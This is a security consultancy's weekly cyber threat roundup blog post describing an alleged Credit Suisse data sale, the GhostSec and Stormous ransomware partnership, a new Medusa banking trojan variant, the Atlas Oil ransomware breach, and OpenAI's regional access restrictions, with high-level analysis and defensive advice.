Back

Blogs

Global Chaos as Microsoft Outage Disrupts Critical Services

View All

Case Studies

Securing Cyber-Physical Systems for a Defence Manufacturer

View All

Upcoming Events

LEMA Summit 2024

View All

Webinars

Professional woman wearing glasses looking thoughtful in front of data serversProfessional woman wearing glasses looking thoughtful in front of data servers

Thoughts

Trojan variants, ransomware and cybercriminals – how can you stay safe?

2nd Jul, 2024

This week’s Cyber Threat Round up sees Ian Hirst examine a cybercriminal who alleges to have sensitive data belonging to a Global Bank, a hacktivist group turn ransomware Tycoon, a banking trojan variant that is targeting the Global Financial Sector and a website breach on a prominent oil and fuel supply company.

Breaking News: Hacker Advertises Alleged Credit Suisse Data on Cybercriminal Forum

In a shocking development, a cybercriminal using the alias @888 has claimed to possess sensitive data belonging to the global investment bank Credit Suisse. This data breach was announced on a notorious cybercriminal forum, raising alarms within the financial services community.

What’s Allegedly in the Data?

@888 asserts that the compromised dataset includes information of 19,000 individuals. The exposed data purportedly contains: Customer and employee names; Email addresses Employee codes; Dates of birth; Genders; Policy names and relationships; Date of joining (DOJ); Effective dates; and Status and entity information.

A sample image provided by @888 appears to show email addresses with the domain @credit-suisse[.]com, seemingly corroborating the hacker’s claims.

  • The Sale: The threat actor has made it clear that the dataset will be sold only once, exclusively accepting payments in Monero (XMR), a cryptocurrency favoured for its anonymity. The exact price remains undisclosed, with @888 inviting interested parties to contact them directly for negotiations.
  • Who is @888? Analysis of @888’s activities reveals that this user has been an active participant in the cybercriminal forum scene since August 18, 2023. With a positive reputation score of +1,070 and 42 positive reviews from other forum members, @888 is recognised as a reliable initial access and data broker.
  • The Unverified Claims: Despite the alarming nature of these claims, verification remains challenging. Security firm Gemserv has reported its inability to confirm the authenticity of @888’s assertions. However, the detailed description and sample provided lend some weight to the possibility that this data breach could be genuine.
  • The Implications: If these claims prove to be true, the impact on Credit Suisse and its clients could be significant, potentially leading to severe financial and reputational damage. Financial institutions, customers, and employees are urged to remain vigilant and monitor for any suspicious activities.

“Hacktivists Turn Ransomware Tycoons: The Evolution of @GhostSec and @Stormous”

In a dramatic shift from their origins, hacktivist group @GhostSec has joined forces with @Stormous to launch a potent ransomware operation. Both groups are prominent members of @TheFiveFamilies, a relatively new but formidable hacktivist collective.

Originally a pure hacktivist group, @GhostSec announced a significant pivot in October 2023 with the introduction of GhostLocker, their proprietary ransomware-as-a-service (RaaS) written in Golang. The early adopter of this service was none other than @Stormous, setting the stage for a powerful collaboration.

By early February 2024, @GhostSec released GhostLocker V2, also in Golang, boasting new features like a web panel and faster encryption. This release marked a step up in their ransomware capabilities.

On February 24th, through @TheFiveFamilies Telegram channel, a groundbreaking collaborative RaaS project was announced: STMX_GhostLocker. This new venture between GhostLocker and Stormous has since carried out joint double extortion attacks across various sectors in countries including India, Uzbekistan, Indonesia, Poland, Thailand, and Argentina. The consequences of these attacks are publicly listed on a Tor-accessible leak site, where the highest recorded ransom paid is $500,000. For those who refuse to pay, their data is made available for download.

In a surprising turn of events, @GhostSec announced in May 2024 their retirement from cybercrime, transferring all GhostLocker operations to @Stormous. This move marks another significant shift in the ever-evolving landscape of cyber threats.

  • Gemserv’s Insight: The transformation of @GhostSec from a hacktivist group to a key player in the RaaS arena signifies a clear shift towards financial motivations over political. Their growth and development in ransomware operations have been bolstered by the alliances formed within @TheFiveFamilies collective. It is evident that @GhostSec’s primary focus has become ransomware operations.
  • Strategic Implications: The RaaS landscape has seen rapid evolution in recent years. Ransomware authors favour this model as it mitigates some of the operational risks and efforts, providing a consistent revenue stream. This shift is reshaping the cybersecurity threat landscape.
  • Tactical Implications: Following the release of GhostLocker V2, @GhostSec hinted at a forthcoming GhostLocker v3. Whether STMX_GhostLocker is indeed GhostLocker v3 remains uncertain, suggesting the potential for another new version on the horizon.

Recent samples of GhostLocker reveal that the ransomware is now written in Python and obfuscated with base64. It utilises the Fernet library for its encryption processes and communicates with command and control (C2) servers, enabling operators to execute further malicious commands.

Stay vigilant and informed as the dynamics of ransomware and cyber threats continue to evolve.

“Medusa Strikes Again: New Banking Trojan Variant Targets Global Financial Sector”

The financial sector has long been a prime target for cyber criminals, given its critical role in the global economy and the wealth of sensitive data it holds. From the early days of phishing schemes to sophisticated malware attacks, banks and financial institutions have continuously faced an onslaught of cyber threats. In this context, researchers have identified a new variant of the Medusa banking Trojan, signalling a fresh wave of attacks starting from July 2023.

The latest variant of Medusa introduces several significant changes, including a lightweight permission set and the ability to display full-screen overlays and remotely uninstall applications. This campaign has cast a wide net, targeting countries such as Canada, Spain, France, Italy, the United Kingdom, the United States, and Turkey.

One of the notable changes in this new variant is the infection chain. Threat actors are now experimenting with droppers that use fake update lures delivered via SMS phishing (smishing). This shift in technique highlights the evolving nature of cyber threats and the relentless innovation of cyber criminals.

Researchers have identified five active botnets associated with this campaign, each utilising different decoys, distribution methods, and targeting strategies. These botnets are believed to be operated by different affiliates, adding to the complexity and reach of the campaign.

  • Gemserv’s Insight: It’s important to note that the Medusa banking Trojan is distinct from both the Medusa ransomware and the Medusa botnet, with no confirmed connections between them at this time.
  • Strategic Implications: Medusa possesses a range of capabilities, including keylogging, remote control, and the ability to read and write SMS messages. Delivered through smishing, the malware is likely to use its SMS capabilities to propagate further, infecting additional numbers on compromised devices.
  • Tactical Implications: To protect against this threat, mobile phone users should exercise caution and avoid installing applications or updates from unofficial or unconfirmed sources, especially those received via SMS messages.

The banking sector must remain vigilant as cyber threats continue to evolve. The Medusa Trojan’s new variant underscores the need for robust cybersecurity measures and awareness to safeguard critical financial data from relentless cyber adversaries.

“Oil Under Siege: Atlas Oil Hit by Major Ransomware Attack, 730GB of Data Exfiltrated”

Atlas Oil, a prominent oil and fuel supply distribution company based in Houston, Texas, has confirmed it suffered a significant ransomware attack leading to substantial data exfiltration. The breach, reported on Atlas Oil’s website, occurred on May 5, 2024, and was initiated through a phishing attack.

The compromised data includes sensitive customer information such as names, email addresses, mailing addresses, phone numbers, and other identifiable details. On May 21, 2024, the ransomware group @BlackBasta listed Atlas Oil on its data leak site (DLS), subsequently publishing what it claims to be 730GB of the company’s data. This data, available for free via Tor-links, includes files categorised as legal, financial, operational, as well as customer and supplier information.

  • Gemserv’s Insight: @BlackBasta is a financially motivated, Russian-speaking ransomware group, likely formed in February 2022. The group operates a Ransomware-as-a-Service (RaaS) model, which allows affiliates to carry out attacks using their ransomware.
  • Strategic Implications: Operating within the energy sector, Atlas Oil is part of a highly vulnerable industry. The global oil market’s sensitivity to disruptions means incidents like this have the potential to cause international volatility in oil prices. However, no such impact has been observed at the time of writing.
  • Tactical Implications: Atlas Oil’s confirmation notice is presented as a JPEG image of a written report, accessible via an obscurely placed weblink at the top of the company’s page. This approach likely aims to prevent search engines from indexing the content and to reduce the visibility of the compromise.

Details regarding the initial phishing attack that led to the data exfiltration remain sparse. However, this incident underscores the critical importance of robust cybersecurity measures and heightened vigilance within the energy sector.

As Atlas Oil navigates this breach, the broader industry must take heed of the evolving cyber threat landscape and bolster defences to protect against similar attacks.

“The Geopolitics of AI: Navigating the Complex Landscape of Technology Access Amid Election Security Concerns”

In an unprecedented move, OpenAI has announced its decision to restrict access to its AI services in China, Russia, and Iran. This strategic decision highlights the increasingly intertwined relationship between technological advancement, geopolitical tensions, and the security of democratic processes. OpenAI, renowned for its AI-driven platform ChatGPT, cited the need to halt influence campaigns and cybercrime emanating from these regions as a key motivator for its actions. Additionally, the broader context involves U.S. government policies aimed at curtailing the flow of American AI technologies to certain international markets.

The technical underpinnings of this situation are deeply rooted in cybersecurity concerns. OpenAI has actively disrupted operations in these countries that sought to misuse its services for generating phishing emails and malicious scripts. This proactive stance is part of a broader effort to prevent the manipulation of public opinion and safeguard electoral integrity, not only in the U.S. but also in other democracies such as the UK.

Recent intelligence reports indicate that hostile nation-states are actively engaging in disinformation campaigns aimed at disrupting the upcoming UK general election, utilising digital platforms to spread false narratives through the use of digital platforms to disseminate disinformation. These actors employ a variety of tactics to undermine democratic integrity:

  • Disinformation Campaigns: Fabricating or distorting information to mislead voters and create social divisions.
  • Cyber Attacks on Election Infrastructure: Targeting voter registration databases and electronic voting systems to manipulate voter data or disrupt the voting process.
  • Social Media Manipulation: Using bots and trolls to amplify divisive content and fake news to influence public opinion and voter behaviour.
  • Phishing Attacks: Targeting political parties and election officials with deceptive emails to steal sensitive information or gain unauthorised access to internal systems.
  • Deep Fakes: Utilising AI to create hyper-realistic but entirely fabricated audiovisual content to discredit political figures or mislead voters about their policies and actions.

From a technical perspective, OpenAI utilises advanced algorithms and compliance systems to monitor and manage API traffic. This enables the firm to detect and respond to suspicious activities potentially linked to cyber threats. The implications of such technological control are significant, not only in terms of cybersecurity but also for the global AI technology landscape and the integrity of electoral processes.

Companies that leverage OpenAI’s technology internationally may face operational uncertainties. For instance, users of Vercel, a cloud company with a regional edge network that includes Hong Kong, have received notifications similar to those directed at users in the aforementioned countries. This raises questions about the ripple effects on companies headquartered in the U.S. but operating globally.

Furthermore, the U.S.-China tech war continues to escalate, with recent U.S. restrictions on the export of advanced AI chips to China marking a significant development. These geopolitical manoeuvres aim to curtail Beijing’s technological ascendance, especially in AI. In response, China is increasingly turning towards domestic innovations to reduce its dependency on foreign AI technologies, though the effectiveness and quality of these indigenous technologies remain under scrutiny.

The strategic decoupling of AI services as seen in OpenAI’s recent moves is a bellwether for the future of international tech relations. It underscores a world where technology access is becoming a new frontier in geopolitical strategy, affecting everything from business operations to international diplomacy and election security. As nations and companies navigate this complex terrain, the intersection of technology, security, and international policy will undoubtedly shape the future of global AI deployment and its role in protecting democratic values.

Authors

Ian Hirst

Partner, Cyber Threat Services

Read Bio